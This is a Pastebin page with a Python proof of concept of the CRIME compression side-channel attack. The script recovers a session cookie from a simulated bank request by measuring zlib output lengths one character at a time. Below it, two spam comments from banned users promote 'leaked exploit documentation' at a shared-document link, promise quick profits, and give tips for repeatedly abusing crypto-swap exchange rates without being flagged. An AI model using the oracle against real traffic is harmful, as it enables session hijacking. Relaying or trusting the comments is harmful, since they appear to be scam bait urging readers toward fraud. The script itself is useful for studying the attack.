Guest User

crime

a guest
Sep 11th, 2012
4,095
0
Never
4
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.07 KB | None | 0 0
  1. import string
  2. import zlib
  3.  
  4. HEADERS = ("POST / HTTP/1.1\r\n"
  5.        "Host: thebankserver.com\r\n"
  6.            "Connection: keep-alive\r\n"
  7.            "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
  8.        "Accept: */*\r\n"
  9.            "Referer: https://thebankserver.com/\r\n"
  10.            "Accept-Encoding: gzip,deflate,sdch\r\n"
  11.            "Accept-Language: en-US,en;q=0.8\r\n"
  12.            "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
  13.        "Cookie: secret=7xc89f+94/wa\r\n\r\n")
  14.  
  15. BODY = "Cookie: secret="
  16.  
  17. def compress(data):
  18.     c = zlib.compressobj()
  19.     return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
  20.  
  21. cookie = ""
  22. while len(cookie) < 12:
  23.     smallest_char = ""
  24.     smallest_length = 0
  25.     for c in string.printable:
  26.         length = len(compress(HEADERS +
  27.                       BODY +
  28.                       cookie +
  29.                       c))
  30.         print repr(c), length
  31.         if not smallest_length or length < smallest_length:
  32.             smallest_length = length
  33.             smallest_char = c
  34.     cookie += smallest_char
  35.  
  36. print "final result: %s" % cookie
Advertisement
Comments
  • PantaniGiacomo
    59 days
    # CSS 0.84 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from Swapzone — instant swap).
  • User was banned
  • Kormovek
    41 days
    # CSS 0.85 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 25% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from SimpleSwap — instant swap).
  • User was banned
Add Comment
Please, Sign In to add comment